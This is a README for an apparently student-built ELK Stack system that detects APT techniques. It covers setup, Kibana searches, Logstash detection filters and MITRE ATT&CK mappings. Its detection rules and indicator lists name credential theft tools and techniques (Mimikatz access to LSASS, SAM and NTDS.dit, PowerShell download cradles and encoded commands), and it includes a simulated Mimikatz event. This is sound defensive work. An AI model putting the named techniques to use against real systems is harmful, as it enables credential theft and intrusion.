This project implements a complete Advanced Persistent Threat (APT) detection system using the ELK Stack (Elasticsearch, Logstash, Kibana) with Beats for log collection. The system detects various stages of APT attacks including:
- Credential Dumping (MITRE T1003)
- Internal Reconnaissance (MITRE T1087, T1018, T1082)
- Lateral Movement (MITRE T1021)
- PowerShell Execution (MITRE T1059.001)
- Data Exfiltration (MITRE T1041, T1048)
apt-detection-elk/
├── docker-compose.yml # ELK Stack orchestration
├── logstash/
│ └── pipeline/
│ └── beats-input.conf # Main Logstash pipeline with detection logic
├── beats/
│ ├── filebeat/
│ │ └── filebeat.yml # File log collection config
│ ├── winlogbeat/
│ │ └── winlogbeat.yml # Windows Event Log collection
│ └── packetbeat/
│ └── packetbeat.yml # Network traffic monitoring
├── detection-rules/
│ ├── 01-credential-dumping.json # Credential access detection
│ ├── 02-reconnaissance.json # Discovery activities detection
│ ├── 03-lateral-movement.json # Lateral movement detection
│ └── 04-powershell-exfiltration.json # Execution & exfiltration detection
├── kibana-dashboards/ # Dashboard configurations
├── sample-data/ # APT sample datasets
├── scripts/
│ ├── create-kibana-dashboards.sh # Dashboard setup script
│ └── generate-sample-apt-data.sh # Sample data generator
└── README.md # This file
┌─────────────────┐
│ Log Sources │
│ (Windows/Linux) │
│ • Sysmon │
│ • Security │
│ • PowerShell │
│ • Network │
└────────┬────────┘
│
▼
┌─────────────────┐
│ Beats Agents │
│ • Filebeat │
│ • Winlogbeat │
│ • Packetbeat │
└────────┬────────┘
│ Port 5044
▼
┌─────────────────┐
│ Logstash │
│ • Parse logs │
│ • Apply filters │
│ • Enrich data │
│ • Detect threats│
└────────┬────────┘
│
▼
┌─────────────────┐
│ Elasticsearch │
│ • Index data │
│ • Store events │
│ • Run queries │
└────────┬────────┘
│
▼
┌─────────────────┐
│ Kibana │
│ • Visualize │
│ • Dashboard │
│ • Alerts │
└─────────────────┘
- Log Collection: Beats agents collect logs from endpoints, servers, and network
- Data Ingestion: Logs are forwarded to Logstash via port 5044
- Parsing & Enrichment: Logstash parses logs and adds threat indicators
- Threat Detection: Pattern matching against APT signatures
- Indexing: Events are indexed in Elasticsearch
- Alerting: Threats are tagged and routed to
apt-threats-*index - Visualization: Kibana dashboards display detected activities
- Docker and Docker Compose installed
- 4GB+ RAM available for containers
- 10GB+ disk space
- Linux (Arch/Ubuntu/Debian) or macOS host
The easiest way to get started is using the automated startup script:
# Run the automated setup script
./start.shThis script will:
- ✅ Check Docker and Docker Compose installation
- ✅ Start all ELK Stack services
- ✅ Wait for Elasticsearch and Kibana to be ready
- ✅ Generate sample APT attack data
- ✅ Create Kibana dashboards and visualizations
- ✅ Display system status and access points
That's it! The system will be fully operational in 2-3 minutes.
If you prefer manual setup:
# 1. Make scripts executable
chmod +x scripts/*.sh
# 2. Start ELK Stack
docker-compose up -d
# 3. Wait for services (2-3 minutes)
docker-compose ps
# 4. Generate sample data
cd scripts
./generate-sample-apt-data.sh
# 5. Create dashboards
./create-kibana-dashboards.sh# Check Elasticsearch
curl http://localhost:9200
# Check Kibana (wait until ready)
curl http://localhost:5601/api/statusExpected output: Elasticsearch cluster should return version info, Kibana should show "green" state.
cd scripts
./generate-sample-apt-data.shThis creates sample logs simulating:
- Mimikatz credential dumping
- Reconnaissance commands
- RDP lateral movement
- Encoded PowerShell execution
- Large data transfers
Open your browser and navigate to:
http://localhost:5601
- Go to Management → Stack Management → Index Patterns
- Create pattern:
apt-detection-*with time field@timestamp - Create pattern:
apt-threats-*with time field@timestamp
Or run the automated script:
cd scripts
./create-kibana-dashboards.shOnce the system is running, open your web browser and navigate to:
http://localhost:5601
No authentication required (development mode)
- Click the ☰ Menu button (top left corner)
- Go to Analytics → Discover
- You'll see the data exploration interface
- Click the dropdown at the top left (below the search bar)
- Select:
apt-detection-*- This shows all collected events (~3,790 documents)
- Or select:
apt-threats-*- This shows only detected threats
By default, you'll see all events with their timestamps. Each event contains:
@timestamp- When the event occurredhost.name- Source machinemessage- Event detailsthreat_detected- Type of threat (if detected)mitre_technique- MITRE ATT&CK technique IDseverity- Threat severity level
Use the search bar at the top to filter events. Examples:
Find Credential Dumping:
threat_detected: "credential_dumping"
Find Reconnaissance Activity:
threat_detected: "reconnaissance"
Find Critical Threats:
severity: "critical"
Find Multiple Threat Types:
threat_detected: ("credential_dumping" OR "lateral_movement")
Find Threats on Specific Host:
host.name: "VICTIM-PC" AND _exists_: threat_detected
- Click on any event to expand it
- You'll see all fields including:
- threat_detected - Attack type
- mitre_technique - MITRE ATT&CK ID (e.g., T1003.001)
- mitre_tactic - Attack tactic (e.g., Credential Access)
- severity - critical/high/medium
- winlog.event_data - Windows event details
- network - Network traffic data
- Click the time picker at the top right
- Select a time range:
- Last 15 minutes
- Last 1 hour
- Last 24 hours
- Custom range
- Data will refresh automatically
- Go to ☰ Menu → Analytics → Dashboard
- Click Create dashboard
- Click Create visualization
- Choose visualization type:
- Bar chart - Compare threat counts
- Pie chart - Show threat distribution
- Line chart - Show threats over time
- Data table - List detailed events
- Go to ☰ Menu → Stack Management → Rules
- Click Create rule
- Choose Elasticsearch query
- Set up alert conditions:
- Index:
apt-threats-* - Query:
severity: "critical" - Threshold: Count > 0
- Index:
- Configure notifications (email, Slack, etc.)
| Severity | Description | Examples |
|---|---|---|
| Critical | Immediate action required | Credential dumping, Data exfiltration |
| High | Potential breach in progress | Lateral movement, PowerShell execution |
| Medium | Suspicious activity | Reconnaissance, Port scanning |
- MITRE: T1003.001
- What: Mimikatz, LSASS access, password dumpers
- Indicators:
- Source: mimikatz.exe, procdump.exe
- Target: lsass.exe
- Event ID: 10 (process access)
Search Query:
threat_detected: "credential_dumping"
- MITRE: T1087, T1082
- What: System/network enumeration
- Indicators:
- Commands: whoami, net user, ipconfig, netstat
- Active Directory queries
Search Query:
threat_detected: "reconnaissance"
- MITRE: T1021.001, T1021.002
- What: Moving between systems
- Indicators:
- RDP connections (LogonType 10)
- SMB access (LogonType 3)
- PSExec usage
Search Query:
threat_detected: "lateral_movement"
- MITRE: T1059.001
- What: Malicious PowerShell usage
- Indicators:
- Base64 encoded commands
- Download cradles (Invoke-WebRequest)
- Invoke-Expression (IEX)
Search Query:
threat_detected: ("encoded_powershell" OR "powershell_download")
- MITRE: T1041
- What: Large data transfers out
- Indicators:
- Transfer size > 10MB
- Unusual destination IPs
- High volume traffic
Search Query:
threat_detected: "data_exfiltration"
Find all credential dumping attacks:
curl -s 'http://localhost:9200/apt-detection-*/_search?pretty' \
-H 'Content-Type: application/json' -d '{
"query": {
"match": {"threat_detected": "credential_dumping"}
},
"size": 5
}'Find all critical threats:
curl -s 'http://localhost:9200/apt-detection-*/_search?pretty' \
-H 'Content-Type: application/json' -d '{
"query": {
"term": {"severity": "critical"}
},
"size": 10
}'Count threats by type:
curl -s 'http://localhost:9200/apt-detection-*/_search?pretty' \
-H 'Content-Type: application/json' -d '{
"size": 0,
"aggs": {
"threat_types": {
"terms": {"field": "threat_detected.keyword", "size": 10}
}
}
}'For more examples, see: SEARCH_EXAMPLES.md
What it detects:
- LSASS process access (Event ID 10)
- Mimikatz execution
- SAM registry access
- NTDS.dit file access
Example Query:
GET /apt-detection-*/_search
{
"query": {
"bool": {
"must": [
{ "term": { "winlog.event_id": 10 } },
{ "regexp": { "winlog.event_data.TargetImage": ".*lsass\\.exe" } }
]
}
}
}Why it works: Mimikatz and similar tools must access LSASS memory to dump credentials. Sysmon Event ID 10 logs process access events.
What it detects:
whoami,net user,net groupcommandsipconfig,netstat,systeminfo- Active Directory queries
- Network scanning
Example Query:
GET /apt-detection-*/_search
{
"query": {
"regexp": {
"message": ".*\\b(whoami|net user|net group|nltest)\\b.*"
}
}
}Why it works: Attackers enumerate the environment to identify targets and privilege escalation paths.
What it detects:
- RDP connections (LogonType 10)
- SMB lateral movement (LogonType 3)
- PSExec usage
- WMI remote execution
- Admin share access
Example Query:
GET /apt-detection-*/_search
{
"query": {
"bool": {
"must": [
{ "term": { "winlog.event_id": 4624 } },
{ "term": { "winlog.event_data.LogonType": "10" } }
]
}
}
}Why it works: Network logon types indicate remote access attempts, essential for lateral movement.
What it detects:
- Base64 encoded commands
- Download cradles (
Invoke-WebRequest,DownloadString) Invoke-Expression(IEX)- Reflection and assembly loading
- PowerShell remoting
Example Query:
GET /apt-detection-*/_search
{
"query": {
"regexp": {
"winlog.event_data.CommandLine": ".*-[Ee]nc.*[A-Za-z0-9+/]{50,}.*"
}
}
}Why it works: Encoded PowerShell is commonly used to evade signature-based detection.
What it detects:
- Large outbound transfers (>10MB)
- Unusual ports (FTP, custom ports)
- DNS tunneling
- High volume DNS queries
Example Query:
GET /apt-detection-*/_search
{
"query": {
"bool": {
"must": [
{ "range": { "network.bytes": { "gte": 10485760 } } },
{ "term": { "network.direction": "outbound" } }
]
}
}
}Why it works: Large data transfers to external IPs indicate potential exfiltration.
-
Attack Simulation
Sample log (already generated):
{ "@timestamp": "2024-01-15T10:23:45Z", "host": {"name": "VICTIM-PC"}, "winlog": { "event_id": 10, "event_data": { "SourceImage": "C:\\Tools\\mimikatz.exe", "TargetImage": "C:\\Windows\\System32\\lsass.exe", "GrantedAccess": "0x1FFFFF" } } } -
Logstash Detection
The Logstash pipeline detects this pattern:
if [winlog][event_data][TargetImage] =~ /(?i)lsass\.exe/ { mutate { add_field => { "threat_detected" => "credential_dumping" "mitre_technique" => "T1003.001" "severity" => "critical" } add_tag => ["apt_detected", "credential_access"] } }
-
Elasticsearch Indexing
Event is indexed to
apt-threats-*with enriched fields. -
Kibana Alert
Query in Kibana Discover:
threat_detected: "credential_dumping" AND severity: "critical" -
Investigation
Security analyst sees:
- Process:
mimikatz.exe - Target:
lsass.exe - MITRE Technique: T1003.001
- Recommended Action: Isolate host, reset credentials
- Process:
All detection rules are in the detection-rules/ directory. Each file contains:
- Rule description
- MITRE ATT&CK mapping
- Elasticsearch DSL queries
- Example usage
To test a rule:
# Example: Test credential dumping detection
curl -X GET "localhost:9200/apt-detection-*/_search?pretty" \
-H 'Content-Type: application/json' \
-d @detection-rules/01-credential-dumping.json-
APT Threat Detection Timeline
- Shows threats over time by category
-
MITRE ATT&CK Tactics
- Pie chart of attack tactics distribution
-
Suspicious Processes
- Table of processes with threat indicators
-
Failed Login Attempts
- Timeline of failed authentications
-
Network Traffic Anomalies
- Outbound traffic volume over time
- Go to Kibana → Dashboard → Create Dashboard
- Add visualizations based on your needs
- Save and share with your team
# Start all services
./start.sh
# OR
docker-compose up -d
# Stop all services
docker-compose down
# Stop and remove all data
docker-compose down -v
# Restart all services
docker-compose restart
# Restart specific service
docker-compose restart logstash# View all logs
docker-compose logs -f
# View specific service logs
docker-compose logs -f elasticsearch
docker-compose logs -f kibana
docker-compose logs -f logstash
docker-compose logs -f filebeat
# View last 100 lines
docker-compose logs --tail=100 logstash# View service status
docker-compose ps
# Check Elasticsearch health
curl http://localhost:9200/_cluster/health?pretty
# View Elasticsearch indices
curl 'http://localhost:9200/_cat/indices?v'
# Count indexed documents
curl 'http://localhost:9200/apt-detection-*/_count?pretty'
# Check Kibana status
curl http://localhost:5601/api/status# Regenerate sample data
cd scripts
./generate-sample-apt-data.sh
# View sample data files
ls -la sample-data/
# Delete specific index
curl -X DELETE 'http://localhost:9200/apt-detection-2025.10.04'
# Delete all detection indices
curl -X DELETE 'http://localhost:9200/apt-detection-*'# View container resource usage
docker stats
# View Elasticsearch stats
curl 'http://localhost:9200/_nodes/stats?pretty'
# View Logstash stats
curl 'http://localhost:9600/_node/stats?pretty'Solution:
# Check logs
docker-compose logs elasticsearch
# Increase virtual memory (Linux)
sudo sysctl -w vm.max_map_count=262144
# Make permanent
echo "vm.max_map_count=262144" | sudo tee -a /etc/sysctl.conf
# Restart Elasticsearch
docker-compose restart elasticsearchCheck 1 - Services Running:
docker-compose ps
# All services should show "Up"Check 2 - Indices Created:
curl 'http://localhost:9200/_cat/indices?v'
# Should see apt-detection-* indicesCheck 3 - Logstash Processing:
docker-compose logs logstash | grep "Pipeline started"Check 4 - Sample Data Exists:
ls -la sample-data/
# Should see .log and .json filesSolution:
# Restart all services
docker-compose restart
# Wait 30 seconds, then check
curl 'http://localhost:9200/apt-detection-*/_count?pretty'Solution:
# Check Kibana logs
docker-compose logs kibana
# Wait for message: "Kibana is now available"
# This can take 2-3 minutes on first startup
# If stuck, restart Kibana
docker-compose restart kibanaSolution:
# Check Filebeat logs
docker-compose logs filebeat
# Verify configuration
docker exec -it filebeat filebeat test config
# Restart Filebeat
docker-compose restart filebeatSolution:
# Reduce Java heap size in docker-compose.yml
# Edit these lines:
ES_JAVA_OPTS: "-Xms1g -Xmx1g" # Reduce from 2g if needed
LS_JAVA_OPTS: "-Xms512m -Xmx512m" # Reduce from 1g if needed
# Restart services
docker-compose down
docker-compose up -dSolution:
# Check what's using the port
sudo lsof -i :5601 # Kibana
sudo lsof -i :9200 # Elasticsearch
sudo lsof -i :5044 # Logstash
# Stop conflicting service or change port in docker-compose.ymlSolution:
# Clean up unused Docker resources
docker system prune -a
# Remove old volumes
docker volume prune
# Check disk usage
docker system dfTo use public APT datasets:
-
Download APT samples from:
- MITRE Cyber Analytics Repository
- SecRepo.com
- Mordor Project (https://github.com/OTRF/Security-Datasets)
-
Convert to compatible format:
# Example for EVTX files python3 evtx_to_json.py input.evtx > output.json
-
Copy to sample-data directory:
cp output.json sample-data/
-
Restart Filebeat/Logstash:
docker-compose restart filebeat logstash
-
Increase resources in
docker-compose.yml:ES_JAVA_OPTS: "-Xms4g -Xmx4g"
-
Enable index lifecycle management:
# Delete old indices after 30 days curl -X PUT "localhost:9200/_ilm/policy/apt-policy" -H 'Content-Type: application/json' -d' { "policy": { "phases": { "delete": { "min_age": "30d", "actions": {"delete": {}} } } } }'
-
Use hot-warm-cold architecture for large deployments
-
Enable authentication (X-Pack Security)
- Enable Elasticsearch security (X-Pack)
- Use HTTPS for all connections
- Implement role-based access control
- Encrypt data at rest
- Set up proper firewall rules
- Use secrets management for credentials
| Tactic | Technique | Coverage |
|---|---|---|
| Credential Access | T1003.001 (LSASS Memory) | ✅ Full |
| Credential Access | T1003.002 (SAM) | ✅ Full |
| Credential Access | T1110 (Brute Force) | ✅ Full |
| Discovery | T1087 (Account Discovery) | ✅ Full |
| Discovery | T1082 (System Information) | ✅ Full |
| Lateral Movement | T1021.001 (RDP) | ✅ Full |
| Lateral Movement | T1021.002 (SMB) | ✅ Full |
| Execution | T1059.001 (PowerShell) | ✅ Full |
| Exfiltration | T1041 (C2 Channel) | ✅ Full |
| Exfiltration | T1048 (Alternate Protocol) | ✅ Full |
| Command and Control | T1071.004 (DNS) | ✅ Full |
To add new detection rules:
- Create a new JSON file in
detection-rules/ - Follow the existing format with MITRE mappings
- Add corresponding Logstash filters in
logstash/pipeline/ - Test with sample data
- Document in this README
| File | Description |
|---|---|
README.md |
Main documentation (this file) |
PROJECT_STATUS.md |
Current system status and access info |
SEARCH_EXAMPLES.md |
Comprehensive search query examples |
DETECTION_QUERIES.md |
Detection rule explanations |
Located in sample-data/ directory:
apt-events.json- JSON formatted APT eventscredential-dumping.log- Mimikatz, LSASS accessreconnaissance.log- System enumeration commandslateral-movement.log- RDP, SMB, PSExec activitypowershell-execution.log- Encoded PowerShell commandsdata-exfiltration.log- Large data transfers
- Kibana UI: http://localhost:5601
- Elasticsearch API: http://localhost:9200
- Logstash Monitoring: http://localhost:9600
- MITRE ATT&CK Framework: https://attack.mitre.org/
- Elastic Security Docs: https://www.elastic.co/guide/en/security/current/index.html
Current state:
- ❌ No authentication required
- ❌ HTTP only (no HTTPS)
- ❌ Default encryption keys
- ❌ No network isolation
- ❌ Debug logging enabled
You MUST implement:
-
Enable X-Pack Security
# In docker-compose.yml xpack.security.enabled: true
-
Configure HTTPS
- Generate SSL certificates
- Configure Elasticsearch, Kibana, and Logstash with TLS
- Enable certificate validation
-
Set Strong Encryption Keys
# Generate random keys openssl rand -base64 32 # Add to docker-compose.yml xpack.security.encryptionKey: "your-random-32-byte-key" xpack.encryptedSavedObjects.encryptionKey: "your-random-32-byte-key" xpack.reporting.encryptionKey: "your-random-32-byte-key"
-
Enable Authentication
- Create users with appropriate roles
- Implement role-based access control (RBAC)
- Use strong passwords
-
Network Security
- Use firewalls to restrict access
- Implement VPN for remote access
- Isolate ELK stack in private network
- Use reverse proxy for external access
-
Data Protection
- Enable encryption at rest
- Implement backup strategy
- Set up index lifecycle management (ILM)
- Configure data retention policies
-
Monitoring & Auditing
- Enable audit logging
- Monitor for unauthorized access
- Set up alerting for security events
- Regular security assessments
-
Edit Logstash Configuration
- File:
logstash/pipeline/beats-input.conf - Add detection logic in the
filtersection
Example:
if [message] =~ /(?i)malicious_pattern/ { mutate { add_field => { "threat_detected" => "custom_threat" "mitre_technique" => "T1234" "severity" => "high" } add_tag => ["apt_detected", "custom"] } }
- File:
-
Restart Logstash
docker-compose restart logstash
Edit severity levels in logstash/pipeline/beats-input.conf:
# Change from "medium" to "high"
mutate {
add_field => { "severity" => "high" }
}-
Windows Machines:
- Install Winlogbeat on Windows hosts
- Configure to send to Logstash (port 5044)
- Enable Sysmon for detailed process monitoring
-
Linux Servers:
- Configure Filebeat on Linux hosts
- Monitor /var/log files
- Send to Logstash
-
Network Devices:
- Configure syslog forwarding
- Point to Logstash port 5000
Edit docker-compose.yml:
# Increase Elasticsearch memory
ES_JAVA_OPTS: "-Xms4g -Xmx4g" # From 2g
# Increase Logstash memory
LS_JAVA_OPTS: "-Xms2g -Xmx2g" # From 1g-
Index Lifecycle Management (ILM)
- Automatically delete old indices
- Move data to cold storage
- Optimize shard allocation
-
Cluster Scaling
- Add more Elasticsearch nodes
- Distribute data across nodes
- Use dedicated master nodes
-
Logstash Optimization
- Increase pipeline workers
- Batch size tuning
- Use persistent queues
-
Data Retention
# Delete indices older than 30 days curl -X DELETE 'http://localhost:9200/apt-detection-$(date -d "30 days ago" +%Y.%m.%d)'
This APT Detection System is designed to:
- ✅ Detect common APT attack techniques
- ✅ Map detections to MITRE ATT&CK framework
- ✅ Provide real-time visibility into threats
- ✅ Enable security analysts to investigate incidents
- ✅ Demonstrate ELK Stack capabilities for threat detection
| Tactic | Techniques Covered | Detection Rate |
|---|---|---|
| Credential Access | 3 | High |
| Discovery | 5 | High |
| Lateral Movement | 4 | High |
| Execution | 3 | High |
| Exfiltration | 2 | Medium |
| Command & Control | 1 | Medium |
Total: 18 techniques across 6 tactics
Contributions are welcome! To add new features:
- Fork the repository
- Create a feature branch
- Add detection rules or improvements
- Test thoroughly
- Submit a pull request
- 🔍 Additional detection rules
- 📈 More Kibana visualizations
- 📦 Integration with SIEM platforms
- 📚 Documentation improvements
- 🐛 Bug fixes
- ✅ Full ELK Stack integration
- ✅ 5 major threat detection categories
- ✅ Automated setup script
- ✅ Kibana dashboards
- ✅ Sample APT data
- ✅ Comprehensive documentation
Q: Can this detect real APT attacks? A: Yes, but it requires real log data from your environment. The sample data is for demonstration.
Q: How do I add my Windows machines? A: Install Winlogbeat and configure it to send logs to Logstash port 5044.
Q: What's the minimum system requirements? A: 4GB RAM, 10GB disk space, Docker installed. 8GB RAM recommended for production.
Q: Can I use this in production? A: Yes, but you MUST enable security features (authentication, HTTPS, encryption).
Q: How do I add custom detection rules?
A: Edit logstash/pipeline/beats-input.conf and add your patterns in the filter section.
Q: Does this replace an enterprise SIEM? A: No, this is a lightweight detection system. Enterprise SIEMs have more features.
Q: Can I integrate this with Splunk/QRadar? A: Yes, you can forward events from Logstash to other SIEM platforms.
Q: How long is data retained? A: By default, indefinitely. Configure ILM to automatically delete old data.
- MITRE ATT&CK Framework
- Elastic Stack Documentation
- Elastic Security
- Sysmon Documentation
- Mordor Security Datasets
- Sigma Rules
- Atomic Red Team
Project: APT Detection System using ELK Stack Built for: SIH CyberSec Project Purpose: Advanced Persistent Threat Detection & Analysis
For questions, issues, or suggestions:
- Check documentation files (README.md, PROJECT_STATUS.md, SEARCH_EXAMPLES.md)
- Review troubleshooting section
- Check logs:
docker-compose logs -f - Create an issue in the repository
Built with:
- Elasticsearch - Search and analytics engine
- Logstash - Data processing pipeline
- Kibana - Data visualization
- Beats - Lightweight data shippers
- Docker - Containerization platform
Thanks to the Elastic community and security researchers for their contributions.
🎉 Happy Threat Hunting!
Built for SIH CyberSec Project - APT Detection System